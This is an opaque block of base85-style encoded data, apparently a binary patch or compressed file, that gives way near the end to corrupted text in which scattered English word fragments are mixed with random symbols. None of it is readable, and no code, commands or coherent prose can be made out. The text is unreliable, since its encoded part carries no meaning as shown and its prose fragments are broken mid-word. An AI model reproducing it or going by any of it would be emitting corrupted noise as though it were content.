z4tlbJUza2Y%Jsz+*ihxaiSYE_5cFS$O#Lqe;V?NN53RvI`S@@CPuPmMLjJ*zTlYVM zG3F*|Lmj3hhI;$f{eJ=RhFaLZhg&of#J4uFz?dg$cx~GDD0nv@6G{x``>8S+i~ycyY>v<-StO@&E(m$hj&0r zL7{f|H|ZYvF3Pr*0G@;NWZX>+DTI49?5_ypO}C{2o`dkD+IJ#4X)*b}3<^k~mZT|tv zk7wAJvPJ@^v2We~58-~2f#fwn0*F0Q5u*Rb@23)4o)42zgKlD&xBrQMSKS^^SAx+u?A_6f-pX@-!_e=9&zseNyrbLEfApW6~GRm z9GipDNw%S+dBD*W{GmExcJKLO7EgKfYIdJ!wxqy?5uTKW4juEIbrcd~Mh#4;sJ~u0 z_{Tze6Kw5*bQpvVDg zH!=9z|Hgl}&d2|3u)^iLU4Hy9ca9_fA7gJF6j`)oc|+k&;qF>cxVscqxVyW%yF=mb z?(XjH?wU9h?wY{I^!ui#yJ!0Ki^y2&ECb~2HHLW;K zFAu<$TTQ_gmD#4R3&9nO*(Q7^Ybfmv!4;Q(!<9SM2JIPN%WixY8>pxa!F`w6)-PPS zlNG-N?b>(%x*op?Uir*+K;7Fwb$JTdvY%W)c5UUh;NH6gZrjXmRD~YP&-e~(A*^=@ zda|2cL0)X-cHuU$U#zd3fcG=%fwA@!OU*e7sQ#_?lu9jW zpz??KXr3>_w8W|e;188)jD%(^u~OR!sF zCcpv1K2}N;DwZ)4kr+MF1jLs`ee#5?K6CC{Zi8QPLQ|xUxC^6(B!Q_D#7l@gVV;x; zR9n&*haV$om^S4cPy$oFak4zuU5T|uYR{zmf0A86tErt|6IcO?Z1|w{+ALn zpFvO^g5JM#os_NM{rq(1L^VUxO}2GCHlO`In=*I{cm$y{_BH!q`=y3*TIyQPo87Ih z``wYa_yFV{wvQ?|#{e2)QhkelcNiL!P8bi0z)zhCai_sw_k)ub-z!b@o5WQj44TYT z8u~jpKD;CFMd22-HYmCJt&Hz~XyX+;oxU=kLbg-)b7~pLhDWP2VV;{Cypq?ao2RU% zM;SR`HVBhEG2oKjVuc&ui#(o79B8A=oOqJO&BciGi}Hs6=DdXzu-+r#jc%*Sgt5EQ z3%`F{`PG$?bFV5|=rOS~c`&c_pXk)5y}Y9clC( z(H=Yp-k$byYA_1TluArG$`BGs^cNmmupWykAo9zMpNPd^N+SMA7DN2AFqZhI5rweE 
zs8vW~Y#Y2e@mEqpyb_}kSz8z}sRV+sXuL5zwgjEYsQCP3Y+PY5alz=9A)>-;g!b29 zl&U`N%fJYUB+-Q0+^z54uJ?{}Y-cQ% zNe_Z&Bg;8en1fp18~7>alT9m{x{Th|l5sqh&kgGa&fOn_A93Ec9x>0aHe%NH@%Ql> z@FVam@LM>2_BqaRl(g)%95=ID#rAb#-WcgfeN4QZflD_lLp^x1DEHdeHBjXM zv-MQHl`*`-64JgI+(0)IN2;p`=puMPU4MFXZ|LXRIHAA25%;3B8hc$k_|vgJp+6A% zK#ZXq@e&~HN%l2M_kT&f3-6}l?!uOQDLc;1Tv&{#7t3A&_BP1V%k0b_H=1?qzz3{z z!oYXKT3`6b82$GsyQ^=UZ0Du}K5X~&7%z3BF(U4DRP-2!L;0O*6f@vYPy*HXZyR+z zUt;ftw|d#@0@chd*9~^~4@vc6-ULAM+EY;?9uDSZawMXL?&HO@x(yDI(h=C-l+qJC z3>9>{En?2xi}Y%L$oYI5mlSY^p`r&pB+u;x&#d`1NJ+x?{U$t2_LmpQsqC-!@KXNo z50oe`fHLU=-?GT-9)9u(X`wa=Dt4Gdio8v-#EhW3ZKSt{0iX9;UHqM3%m$-NIt&sTy&nmd)nyBW@)5ExR4O`oS*%d zFlx;(^esYf#jeqkW1SW60w>x9L98RBKzm@Wde`iq+nH;Jex7JNV%TQ7kn1V_kH)#) z|1#ddGa_DIvx=D%b@s&k@)XGS|gR%m^|1G^YnSO7hWasQKZ_@of3AKR#AKg=f-22ha`61q9 z`#uzFKmQ%=2ukz_7!VGnggF=Frdbl1|0AvpuxtYEsMs zZ@15L7K7hZwn=-x4+b9R6YUI)9Ccv-v(wFZ3cp)dPKqnFl0E z)D60gkn{O>Gbe&%lRZLSmhqHYly|7K1nU8Yrgh2Q%E$l)|F!pI1qFU+PnO zk@up~9<+y){Ez>KX^=@XuS0>kZRPFW8f^)2$xWYB8ux zT8(4B#KE`JYP(F*jd9ZyRwLr|bI;PA$I>2fug8z{c=vx~hsVthP&xAPu-ZfLwqp3{ zajqNlepctpJ8j5&nSnr60(!`jn+cit70QbvCj&NaF2IS5#*2|XY&uU)h5FZaG&o*KmPRJ2p^`-CcA2W zc2cP+`KfxihsysO_wHIyo}>v+@ACNmne5(O4tO^pJT&KRvn_6fcx=eo;+|RycUhOV z{8w{;V_d&vdxhNR|9}kBRsG%#_!nkk-0O4EE{z5MGwxe+UuNK&$wI9! 
z_&+-3^8QOW{E4{9&OKKx(^!Fear&!+>tDpDBAHG0m3(i@x$Y)2fJUS3&-E6J3(bhf zDv`J4|H=MZx!2u>c%c>QQZ3BAl9zQhJMCCJwj37z{&AIt1V%#4^%Ax^xPHX4gVjAmjh;ne@<$$ z|21>ejXj)sTT&tNEqvn{1l!On3=QWg?zbVP`rx{1{aX>dBSOcOL95v6yLrevZ-?*L z_4i`Bcq5N6DZQsVsW)-dj+Xi}hlQ*I)$2iN_?{35tflZ=7)O>yQ?j zVxl=)%l7U!feHa;M>g#rYvZ{O)G~x+n6l9^3Ircn)DGpy_=t0rxCBy1M=VvkdQA~T zYU*pYCZ!gY6&8==dX2g9W($553?=qv_aEyTx&62}xWEgh&4uy423#*67u{^(Q{E49 za;?tFphmm3f`f6YV);bYKeU8JF0qUS;&8%;k;&YV6zBy*hy`P}a~4q8%;}8`N;1`( z#3@P#fAAf~Znc^MBlTl58JRrb%dklEM`8~Rl^Xw-Q^({%TZToGKN5dvsQhn^J(CAs z85U*!NZjH6KWc86Jb22m=<`Ps4jteuN7IN5DPm#USp22v9+sO}J&NORUkW?7M%>gP zwueP!t9tr2&L@66vUqCXs`+SdX&qbtcyc=(#hWSLYYyRJa_=5FwzjN#P-<*(E3Q_n zH}Y`4_!DyUij9yx%q5}%gC#$I{?y2(%5I|UcGz>Ewy1?EqX}baUGdP;q{3cq8Irb> zqkf^Ovr~1KDO4VYoJ{b2F!;Fq_b9O0#8()#l_{ZZoI{GLX3Fe=jo5U!=+8(uEz2)l z)6`ht@@q4NY(vk#DuI`NMBSas%hUYxH)!P2U;O6GG=}KHUJDis{6&p zr4`2q9Qsi@L4tjiOgD`I_GA|NyJj}!JK{RuU*p0SC0>1$ind0x#!C>xra=DH^CX$qV)M8iazgNb=V zuW@;K#;vAi#l`@PK23$XSuZQRm#?ri7}ATz8M&8#_TCtsZR@#`v{#dGL#LjpXU5r@ z6V(pqIklesM9R<#8ytsM8V!v!qTsJ^kxm#%=i5d-X;i6BR?Gx}ca3KYiyO8E7(@HT z0*9thx{7M~-T1psgsD@w+6c(#ymR9hG7I&oJG*O0LPLvfNDNcGH18_( zj}jT($@J+N{gIQiR4&BWPUF8Cnio?8TY76>WmaYLc#{jB=TCbBwOpZj=H0cesE_7_ zWtRwzUCq5qF?G+JE(I#Am?VFpLjaNyUpSpTTC*$FulR#-)5@L@h{ga6tedA2x#^F8>(f{1T9r%F?9pYIoial!o^x&6nbVSS zV?+ApvD%u2EgDdx|0G^IGD1<8U`KX+;J|X5Kn`U;Yi1Q^$+&tnf0Hi!r%$DbAmXCT zqwR8bh(u_g19_jV6t4?Ro`jyjK1~$VG)&Bhi2Zxr8b#b00|g0JDgf!G?MR?|U=hhP zs2S_!*@f3CvPD&aa<1bUN;GQ_&sKNTMrIsa$w5J~)4ML3ITOWHB3|*&pBB|K<7CB= zG%lBx;SFBM;J=HG%{mUJ);Euk1;Z{lZh?XhIOjKy6bY+4EVmQ|2P_mr8>;DG8NK4D zP^q=FoYL~d{MNmz%55A)(RV7hk5j(Q^ zgR?5FD`6NCa2om7_mrYR;p@Sz-jy(R6uz6)e6YZ((U^bGX#6C@l%aI88|j?g&H1}h ze0o*BD`95Yj|6bZh1!dwmX!Ipx&0MTBzke^1kcAjh%p(P8C}=4FtnUDJA<9FjvLFH zNY1%`kAdM6i2==J0vCc4A%eglk3n3i_7k*k&;$mNSSppe59J(m13HtUI#4|oZ9ScK z1Rf4D;3E$@1%;0G^ezYQ&+jFYU=g?TtUU1+EHYY9*$x`CENm=7T0x|jomql4L1aEU z6+SwD#lexGQ^bpGT#Qku*eM-_(o`ce@vA5z?C}vC453dseLAc0^C%98NlHjn6^GJM zr6$G-b|F@d95L&@5Lg$uskN@}KV5cE>3I;U`LR$iNtMe 
z7r|ZQa~Sgt&7}&X6gbOv{(|S&QADxMVr7s~|ApwGW$@1Z!zziGAyYz*%M=wbCSZvr zo?^CeHgqrCrm1hH+<>jb-)q7EPC>3Q1_?&)HpYboxgI&Z<0L}6(RbmOr@s{`Y(=4H z#)PUS8NdjSn&`xXnh=qv4~LTVvDSf*mZk=NI^NH7kI&_`UR=D{(y3uZk} zOD6#Y~Q!(5fhAUxeIFuIGZ;PM*m`I(eEUPsa+!vt^TuF3gU_ zDhR)&CzGIN@-*G4M4ZI)K24$`)Iv)<1HV--lTi?Tnw59ymw7M6t*poDL<%piF3jG~ zT-e#x#mvb})yI2xi8%?qWe~`;GyC%~QvH5)8=J6GzxWZ-2+26uW`|h9`2=!1;(&*4 z5us#kmuX?=3DQ1~65NG}eQuTGV|Z9liVo)WSF6)1`+SjV(XS5pfI+MjMggD73ADl) zs-D4cJ9!DZv@~|@6-VCjE%F;z&OxhwOukB!9owjQ&OPJpG-TQvc5yt*9ozW$7f&*% zImaX}%sQO#>2V+UUj|B-1BV$&DI#%tfm$k+xn>Yesf#JUQ3RH3xKLRO$XVve#2Naw z1WH+lEJ!@6H!SA1c|`)bii)WccS%w zlmwnu$a%|_C`kTJcp-VdS;yvcTDF@7j_&22X&BxsTssGCaFiEfkz zjnHHytXjuM|1kZ5YdZHULq@jAF>$hyv&bl8TVSXlVco#-6mkt-6vs^sCBs_gogpJ` z%69fI6||uv4wDrHGXgI{@HcB2!|EwKLD`3Db}OWe1(rSxeV7dizU$2Lj4AVMi-unz z7iF1FG7Bq5kyN!JqQMu{S#~n?y+@6cjUpnUNyG$J(^Nx8k+e-Bngg(~9!Z;U@@%Gy zUKy+um5n>hQuK#wnRA%y23GnaA^dUoI<-^g+7=B%j|$CRjT|(8*-RrxFf6Z%z8$*R zHUF@Z*%)H$C`i$0Jnu&GP@}Jz`o1EmY@oBvZp>D)Wg8K3Rn(oUI`6$?=E${feFM{_ zgp&!(j?l(Ivigilwa=0lT5=b>~zJt!)*7NJDyUypT3pe|JwX%NRl~~jDhjYVE%hvH;A@mvY@Z9hQR#S`q z0lfS6L=x?Beb2Lu=K10mpx-v~6&H;2j}UOMwQNv6EXQJTk%W3sme}M^9on9$z#x2N zF*1MPp0OQI@G~~bPhrv@gENYQV~Rt{VL2s{@g>of$o#UXq_UWr#6H<p2 zFCIm&;Ai*Y6SpI1xSIydx;l17j6Ktu0)s2kpMx_EVd18zmMQmKNGc?IYa*IqIi}c1 zGi=*mOV7;Q9=~JmnGzc4>l)Av&hUx!cZ+PXWN=C~+ChGb&V#oy*xCwjAGMbb0-}Fk z%dFtxmQa$h(J4$hWP$r6MZ~4)UUz7+QcR%vDAW8hJVfkCK?obrfboIAMe`qG0#>t< zJwh%s^+$)`*$48nB9B?I;f6=cH-w)|T?@nC@&;fX2CNB5sWFM6G`ymMUNt{Un&J}! 
zGjtxSvnt8@xDSln@-j2wuUrxm67pVDmf;DlrRvhPf#`P$i{*}}4Skbu-@24dDO4J8 zaUXzh#wNdaY*!f1V93!G`d_M+emZteor;ywB;V0v$%Q0*T1K>>^A*aD3jBVpke=b&8BbSK+D)I+*g8-@wAL1U?%`y; zUGvn^_cU$O`ud+i_bk;tvvhjnu0emZXk7OoETLqxyjm%5IC2mstQZKJ~WNxz^xyL@76`5E*tGG?T0Ldt?}^8C%ac-8q$dG?ZV`X6mgbH-RAxtfZFW#nYW4#;9#q1m{l>n zU+!X#6h8sj-m`a4X)D*%(CGSEg|OrUxs&rcov+vm@?6;(Sw2iJVAuK_%&w}48wd_F z-Cl9{=VVb#V?@jMy#ZkIKHGS{=k7Z*O5h~Fy{`SC59mxtbu4*#W2d?FK08%)$lAz} zNK<2ePq)nR%x@xlb34B#AB)iOcpS9+5PrH$zY#t~+?e!tJ$D^8@_x9u%sI+V+xd%Vh8=j?}W>ML|dLwbTZO@Mxc&_A;# zN_f+ztRW(3&_}{vNk6AVKV18v&BF@|4`+ZE?)ooh+=SxVajsU&)5@|nYCNCqfL;Jm zx>}NMQxLzPasj2%OZh=)eR*+S+qkBqy|Ry^r@A{v0fZyX8dDHd=MOR)<+_oz;~Jal z3Y)5lv2jEQqo&2B*w2-Z#FT@29z2m~(^JlA)3aukCu9%ob_@z6j+8&I!m3U2tE&q<>d z2)f_VaK35}t$ZnS5QTWzV+K&viZ|L_G3mD1=Z?c73U8(kw4ERiB zqOnMm)}a`iIKOU?pz(`c{ibwp#I~BZstpZjD24FV_y)X)(nghNB(enck{zNP9W~}1 zskcNcFce4Zs9#l!3}#y^LBWFBuEAz8)5%iz#V9j$?Uq|fh?82j8m@rCd+G{)IM!K8 zIFy3@)C8?=z$&3#-ZQw#oN$G4@RHj%9JcNbn&S!~uXSkUHx9EF@J*~Uzf90YFXT_) z#H6h@ylATZ%(U4i)O$2$l=^;lX0WdLy$cq&{~7fDt)2Oo$@OHG#kLk%jFhQ&tE`WT zg(*!h#Ij0*GG9Pdv5=d`#A@|)&Q}oQB<+~VJEh)N5O2A$A?J6ocuy^aea`s569(%X z^_fje{hNz*7}19XSEi%~hD~wj{CvZ}4tZ-SM+`C$=}1ke4oBv*eN$G>pVzf%de;f8>W~+n^d*Ni){r&%0kXsRo5@SOka7Jdi{((qGc5K{i7^w*nw8oQ zpec`J6ZPFHR5uHw4=FC8>T2B-1rWeA8qj+EIYkKTYkRO-_}PsA`E=ZKD(#7+NpOnPBxy@-3PHME@Q$FbuNa(CScNnvic|F{0Kir(vubkzK z>C|+X*2v_?A7D*Qy1Up8-tE)90Iqbw;Buy-RS*gwP5OV-imR5fa}|!?;)%J?)}-Pm z-yPD+ymd`+He1n{rsEaAWVch;I%-EVbEi4dMqit5X9})?xpz#*6*j5X?$3ld_&O^_ zSlS5sG&3`DnOZ#to!fKn4@VLvG=wRSz%89SBYkSpMvOOKKZ=La^;8m>s=1VFNtUVU zY@OV+{TQFn7CCgJz=+Jw<|XkQUIl({<2*MtdqiH#IjH^E$z%28#ixy?XGPxfz!^ve zYZ5=BCimn^XL2@QLx|JH^!~h{@1le|@3=eWt#`DHrYA4|>?rtrehnJYCB@B|nnWiJF~1*orBd)cgP_jiPJb-wM% zY}~HFmp2~H6JHu7Hmnko-$nd z6@5>3!Z%R(w%i?(Y{r@rLTBD~6092@RSH$vr5cjNt#}tURu-VyNJ7rh*b1ptyaV_y z6;0nfDRnf`u{Uf(yZ$bRrnhwYEcmDiQVZWptifp83p@C_`F=!VOyu18v>%j!VI%Rf z9|=ggKtRDSrkKo()2(TCwwO7B`WiFZAB?Uq4_8tcXYUM&O#FeI#$O}(+yw)OJLA02 z_LJ4KrVSCTVPZ|4!?0jUC7zm^=A`f{mYGUsP!GgUi~NfZ1p6 
z>eAh9%+U9&o74NaAV&MT_l&SRugCCMn7Jb~!}Wc^?DFH{N|&cwPhuv67u~hmc{1nZ zW8|Z8ETV_@KJrmr=e6xZb|j*wHk;pF^PSwXrtR6^UR8HKmMQPx<2bbE?xY_S(?`MA zcnSZCZ`F5hdN9I?=3X(obCb}w5-_X#en6AwF$CG}=uk zjoovjMD|L3maA~*`Rg@TT{X6^mr(AkTh!Bwb)Gs(%K#L*(*dhF>d2mAa0ZRu&dV>3 zN4~e?9l+RM8-ampZ$0En@M8pI{P*uek6bYooq64963PRst>-tKoCWpjnOLNuj8*Af zHUm9F%_ryLoOXXDCyu67ciI(uXRuN)34CtDE{bw!ezISYwZEu7@Z4_@UcKpWkCj)U z&lGp@aqoxJ@M)z0PmdxWRo9n!RC@GRk0=57X*>@@aF<=>@9^ND1n+56RW!v%I zOa$De$B&QM#71vj+SH!Is9(iAIJWUzjLJg3!gVF(YVc4t)|iheg{0eR$knpIP_CxZZ*t6QB^&~=>-?o){FMK(MUsJF9gB=_9Jmom^85ppfNa?%D z@C!z2$?6wIsHdE>P~+?FNxJn|Q^ijZ_{FfH!Qr_vL?o;;c53OuJcp2M_zuBo0l3R$2yGBTOO zbbOqVA2v8Bx%e~+gb33Q8VPW+AM(GDW69L(jh-RlBRVd(x<0$!uAX>#W*C%twYRk2 zmpPAlm3a-#tsw-0^p{DH9ly7t5B}DIMhqJmvaSR@BSfyvaw@JW3AiOGRaO!Ri@!~A z9DA1X+r|W61ee1~_3!W18}fw%mG6s$HC95)_-24iOa+eql@kVulie$T01_NP$sqSy zqrXGgc=5vA>nQKo`CW=bpttOh>ifLG^N!;ho~^<*T666;voXUKIXhqbGig7tOr2J2 zuhScH8VRHk?h3lD$EF%t)DkPhHc2L`sHwu=5sB@+gqth#4}@n6DO^)0rg$*%H_2@W zeMLP9P*P8Am;eH2!!4w@+B;Ati*~L(YgR6`fT$4FT(qPvdq3!-nB9)s_{6shrBx1I zRl)wOgJFBT^lfFDa)s_)RxN(QDk3Yau2z-Dij8X0R@>_K%mj(-wmp_L#O0D>Mr7tH zW!l!9&E~0ukKdJdDHxTez>X+9XP2OYLDfUE{d7`Gc>DtB>8nm}E_`(ry1@&7{qvlv zAgP~TBzqUmZ~_L(1t9dta67vhaQ5>A5v(V+_S5%ReAhSmoWh1GFI568iCCr4q4RiS z!>CDafGaq(Z`afxBVNfH$?vN2Lq)+rbHKt zeekROyQ6TN2+i!5X2N#fz}aRJlcfja4zW{<-8R;43mfWjj=(p(0&`U%EA?vZhE@J*Iw%sfsB;1%e)pLbnZ5!80VRjCnn>26?k}*g7aI3eh-rh{A^7V zdJb`6JLHQo=1cNYZYe}8tA`-X^OlzMAA(IjyWeE9LAkcv#aq=gL|6-%^c3W4n1*Tt zBU$fbH#^m8ODt?zf0lR>VbJ_hSctKk$h&7KV)KNLjsZE;eUGd{NQn~ zEK!6&`vH!E#Cx`G6xRNZ~SxC-p^y<7Ipl02^VR-m=Xrv!=m?i}% zKJF}Qgtd_;-{;RG2~_*hpxk0y;dLpe^_ZY$UjvNGL16iq515StjX$`Oy#eRZuotAz zT%wFys8q$@s6b&U<)qF5@(yBPq92kKJtOo^$m#yAjr=7FH=Pq{3af^p?j(Z8UQ1K% z3p5eOGQ!*Am?(ISGeWs*R`@H8C}3(*1QIaWp2M`1CPEtG7eP8Cc(!INBDInu=sm`=t8glRU;IxU2*_ zImKU7Z`ANYmh7XdxYMkecQ!k4eme2SUD|ir$WS+G-cNA7H{(}^4#U^fUoP4uy=a_L z8)f-6@n(3-+j2l?%L~prdDoUA!8mSDgoDXWZ^-hG?$ucDk`mWPi{q@1t`qMMHef_( z-xzXfF7Xz#FC3!ET5rOZu;54Q%SHJuV!+bO`jX`3iZEk`;MR4@SPj3S{c;jp2#2mD 
zc8(GwU+VI_aL{}Yux$2e{OY2)hUY?uADEi9()60qiW3PVQl1cVm9KYBQIOC)Xm(L= zMJ{3`m0x8T3tMWRuq^75L29Ccs9w^qdyX0zb68^^{59MZf>c>%X?79qGls5#`so^um(+; zYuM(%SwqpExfu?;^^(Dugo6a7FpJ$sc5zT~D?BtGdhY?--`u-~z~WEJYg}ZAAW$@e zfnbmuQeX%HX0Ttu9)HTkC$xFgsaKB!@60*C9{tHNB&7^cKXLgti#Rf0j1QV0qOMD zw@s2NQ;Z02ceJ_n9fKrJ<_6;iiGHK{$%n76SZ)z?vQ1-h9~bQ5S{Rv)7&*ow<~u2% z*4~n)0O>JRUhLT#wR9bjwu9?|nd?DzrJMI8%e+fCn{hzqQD89(@@o(CTI3gK*mcf; zZLx9m3xFV790edWKG}fX7JSS@SH15CQTaKO`=L9&CGRaAkG!lGnMcILqbYyFd%ynF z$yKVnT@pEDp#9RB z_A3?^QH{`IUQey#Qa4JP;tTHioN$KNhz^(IoyI1nH7ur$b4@1 z5Z&&Bw;R99-J>=>r0u#T*PQQ`R$vaQAOE&Cczs(h_o|GF5>R?R_{AG|5RMz)v#LcK z3N2#`1>u^xk|E(3)dds>Y5`0E?V*c47(9~d)I9yG+l?4i3Xw8Wqs9RyALTMHw`CW> zXEBrxx4gSaIMOy&MwvR`@$0Ue@JR<_6%!MZi`JT#WB8EI_27kyAZ*MIMk!{R^XlsD z2c|D370b$8&u@@=pvN5U%B#`{$M?yXF=Rze60M6wtvq!S{O)y&MMP(9PC1EO;=v{! zX{sEi0aq)$N;(vdYe<3Gblh0H0Ef`3rDBSxU5qsJcC^A(qI!pT<5PQy4CCM!I+dJC zzvY6}c&(g(+sJ2{#;bf=|C(CZ{#*Mj=EzICMPu46E5pAzri)h6ABC^_s74nkzwNq) zx(^HPv~>C{sb+}f6XI_CxU`RYqxIS&dm(<0sMtO7p^f1~6Sck12@-*@Zhmlf0UZGc zsz{t*an58b-NW<*koSuc^f=DndXk}YfAx-4p@|t>Z$zicp;6fbYNpHZBv=R8_lcpq z64mUUhUkciTn$nb#jx!l-9gr_N{*P!!Ad{P)ILI(7~+Uny87p8m|y_BKcg`M-*k=Uh>-P|Ey#@ zdEN>hvGcC;t4giFESOlgtLkEu=$NZY*EdBcXY_9C=^>4?q0IPW^l+N;GLNi!6af1K zmBaAeTpHy;SNi`p%IK@nqv6#ZcORlF=wAqG{ML(+^*tr1Ip^Npl`5CKDhP_l-W#C| zxq>Dhr9%SHnz3wAj~U+ZTXBm|`767ovsThcC>s+!Y=qoL=t5vfl7CZ-auNO*6LOJR%muTr}SiF|%Fa~1-z;}UPw z9)T!NtE1T{c8}hzU5*?6>FiYtrk$>As>(%00e}B&PO!{R#iyI&y7xO1QVg_c@YKxj zlm)42DKCzQhFR=Tv`d%3`|3$+I~=%L7UyCQ;Qu5er%BYPDe^QxlnC9@uXz5YYq|0X z-sATo(c==qGl79oj1bL)o@ZTL-47dx%X8PL$*O|)e$6&8JQA~7}P)1hJw}GCb0Yh*cBj_)$Z>)K%&>&NDZKj0bZT7^AaAzZfDGInAj+ncFMR2w zSoEbt2j&B%SN|n1-M4JtiI?}1M;mc9a!)WBBL_eFA%c>%Y)|OVX%816@y_{$bC(4< zK^S7t;SN6T6#@og!I<}T^9siG#G{OOHdjV$mB4Ex^(!S45(vsFRHU>lEpO_Tc z@|)`5lmlXeTF%-s^k_f!K+7MR;soZ)Txyo3V>o_aU2Z7XO|=S6Mnt|`qqkrZ^2{yv zdu#);uAVrd0n{vTapf<;Wuqi{)qhRQmE?UHb!#r^V7s>R`I!jlS~;8F_C4Hvh&XHJ zTLPBz9q4eO_>2WweSbC`7VQ3-74>CeR2+OC%TRiFw|>GBn0ou+zGIdLj)A_q4EIRe 
zSg(=QEMQ7NIvAho*sHPhEmiL$qa9J;VYG=}1$-n9{f0MvW;ejc;-UFTbMu@9HHW*= zTYqywLHW87H1m0-N{1N4um72L2t*&QwTbhW+NKZ|2|OxFU>HnzFOiCYU1=02JS1jw z9k7o;-o80~zW-E&uMh>@*!w&Y-~z#W8AI9OQ*NxS#T(spD?$25<3&G2HRBS9iJ^` z%cJg6r+at3bV*C;fLvfwAz8C!%)pVj#t+jD6Ut3%aw=@n)Pfhy@@rcJF6d=JBTiwfpxf1 zPfRQCxCp=b0P>HYcBL_SI#+n9pcyq(n2YnweRM^w3;lX8i~EbedI%{QZ95GJXyv$c zG<26Te%|LM7IIp_rtEp4<`6H6ZxZwIQw}m_Zx|QVnN^F%l@ADk-KeFgaFQ^t{B2`i znfOUpoGfw#1zto`0~2pJf z{aW`sR@QFCMK&FNiu-o<@3p7PIk8I#Aq$k5oy>lHX2YgzRGu8BN2O`;%i}q{!S~Q_ z14YH0x6xI6Sw+gxasDZ`ZTy)NTV3o@8}!|#OQ&Q}+|EC18*91V)|RH-y6}1;E{w)8 zcxfd)*@|=IwEdY9sO5_=4Z(L z76Jk-KCC)bB@t})`~F6eAjzLIb;+c6mq)EOYu;CYA`(qeIzh+W>X52nhes?H5a(Fo zD&K(v95<8O7n_JG?NahyFRAGZ?-lkz$WT#vg^WGTvAR%6;RL>d9K>lOY%gKtm1Y

    ;RD^^67w94`U+9o(@i((G4LQNHldrW{k=?FYK8Hco@!J5^Mss zw2ve(9fcx5gfP4xE4aT;ES=9pE3w}W_nej%)jK443#hq_pMeNNR|MDSFT3bHQS4^S z1w-jgH|hT7j`1)um^&8E$uvBy*k)+GtqOWA%a@H5`k4}K)%WLtsY|4$G_5o5@RA1N zS81tL;otH4*@wH^%6S%ony~e**44_2wqW>#Q7D{wFKPLokc?1dmFW>^>Ba#FUan2& z77Sb5f9JU=nDf%v%~hEp5GV>{g#QH5vGFGH`8^~XiYFzbi$!dmNWkp?W@kGlz8#w( zyEfmhxF`SC5+87B@P5Y@wRyYBIm9?t5G^5VLDOJ{%<78(aVNdoa2mNoS3Xb-# zndGNllfKL`{YXvLDHfy5fx;9KX^oDXx^8&xVTYESxES z!ZXz4mM5=trP2|mC^PkCDvGKje5n|`1hvseX~M9y z8QN7l*|iLqb#nY#+gE!^*{a49ppLq8T({VE3{!(+%+q$JT3*YBowqkPX(D70HsgSC zroULvMgq`;aBrqr9}dUiJcg~gY+o3351=wqhsY%@VYl#TVe)V!R@7qX%T&f&Ggt5O z_z$LCJIud}gf;NnNBS7|=ETqST)+6%=KCBQW)*U}hJkaj{QkgnppB|)>ohTA*DPhw zdk#L5lL9w0DK#yHsQA!iPA|2Oz-cP&d(8@$0wq?&I!`^P%Oc{o7J!@O5Oi_yox*;_ zyzu-M<|#%w6B#ZJf?Nl(cljiP(hGv@?>E^pkQYc5{1K^HrA5mtr)qL#ba`p{_mo)g z_%C?o%QgrX(Im8?2}fQ1%Dr3B<>CIpI;Jw0hJ@vZGwVeP>(aMLcz#3OjisHew&Kj!e7w~s!OqQjaqQZ5 zguXk6hp0MnUk}VbXMfyv6iwZ#8gQi=e+J-U(Tbo1h(WD1t57p1v<>SVQaE`t)g@*z z^h#GB{IRNR0=Fs-D0lQKPiElr9SU{Pmth%8 z(YUDX$(*_zAKA<5+PDJ;b$l#|c=8jObo^dWpqfd0_1n4RuesSW#7Tq6Yiz$7Fxluv z(%9vW+d=A-Syz+jkEoY*s*bRFZs+8mMZM&kz-oe3a=@A6=)x0Z!gxUjyZ0OAJ zj_5LnqMCmaRJJe~`|FH4agra zfAWnR$E4@9!>SqT7uxnz$8w|(xz*x9*4gtmVUPRP73iy}QclOBWg<08h96Ih)25?S zrr)UM+6sF#8;j~`(?zcH+*-9W*qR4oW!bln+%Jiz23+>C30Cs4>&v0_`_&{k54(NN zu^b7==Tj4jD@IQG;TWHls?Fh z=e*&lp&WC(u?a@Fu^_2CL`}Edhl@?v{B4V9PdNt~1$oBRUMrDe6D+)f}x10;2-lZo|SNqC$ZeTN3nTpzWoU` zii=vl^ws%-0Wx(r25*ku z^vU#S5)886!gihk<|vrgu75bX$Gftigl;TD%ZtTm_HvJvo7HEbIE4BRQ%APQ`Z+S0 z+NqTxPpaOj(H_3$ruX~GBxs<5fWO-i?Ll!hu&m`Y$)NSnVSq8_l^4WY#;BP@e`Pa- zX-^ry1N%HbZT?i`P;XUQRMv5$qZoQ?emd20?jh<)x_zo|dXwI~B@nD!bm}Sbv<++3 zdTi5Nz5mZrrBD;?Z|TRbw8G?v8lG~P1Vw(w?hFoe&Glv9fg?`Q&i<$(x+d@AvV-P% zpfbOX*U4=zNc*>r2H-;z@eYIecIy9niJ$BxA{y+BKJFcp$=@*~1PvOvxG!YO{iX9aMR0IVDr6WocMHB%MLBSTgqM)&m zM1;hKim^l!V~H3Wv1`zO8;Zb zhNer*qsQvrIBol-*VLLG*J|HPT-|cj61&nP=Q~{6zp$`*%Zww@f2X#bc-&pI-X9C`&kBU!fdo8fad(zIwEywi?%UM1#apv56+g7Lj6l?w2g321# zGcEpk^h7_f_sccYPYv2@`{IOlgh(^#W!K{v8j_#Bw(=U;aJRxgVkL#AHq 
zox3e(&dHrgw(5~4S2r2oz1*~mhh3Iq`O-U6zPs)D`?rCo6JHrPimq!vxIgbeqU-8T zA9-r`cMNN3a&r0IGiiI?`{DHGb96u7i#XqAkC^_2Z}ON8pTu`xc1&HpDq*pyL$hz< zmxf=MFk|(#OOuk1%?><#Xoh;~p1zPnH1`lL&z&A&H`?P_(aT(#8Z&$jo(gxD=N_J2Jrv(rb{+P>UdgMV1$ z&6)K0z?(-9KV1Az+cW=D{i39Y6aHH8ca^@|a))Cd zCiU!fR^RE*pR`{MyZv_ht*6a?{j%vnSD&4G?=64wq>Fdvm0#QH-fQ;hfDb2ky5{`5 z`_ZJ&f4Os`<>6Jo96#G-{|`so>MeashX(&R>Du9{Z3nH3-&1Yf9AW)r(bYi@7j41k z2?u^$opa~tx21b+e%e_5=dSl3R}J0y{fK)9r=9t9sSkADd+~r6S;9hrhyGdv2CoR>kj$cG+G&>yMAW z-*)^)__N~LV;^T89Q$Bf;L0%z_bmHJ8&S4jy|7z{Ng40AnYZx3o6mlkx>$eNIi~I4 z4Ew~=uMZ3!6IZ?4qImq~xZMw$@Y;6l-|ydp5S$EV%jT;kd#_k%wk>(WtMjyxyZ*e*53chsQ>rO8EYhw^lWIJ`?_o^Ly{o z$!k?FygHa}P8faayY0=o*}Pnw)TztHr?w|rO=ZjxmDA5ipd~)-^Cr1i~9O`8HUY}>9|DHV2HSS35ru2tdz5BmC@}RY4)g}|4B6FvwAy;}E7=3eQ<&)}Tr@M7_H(ver 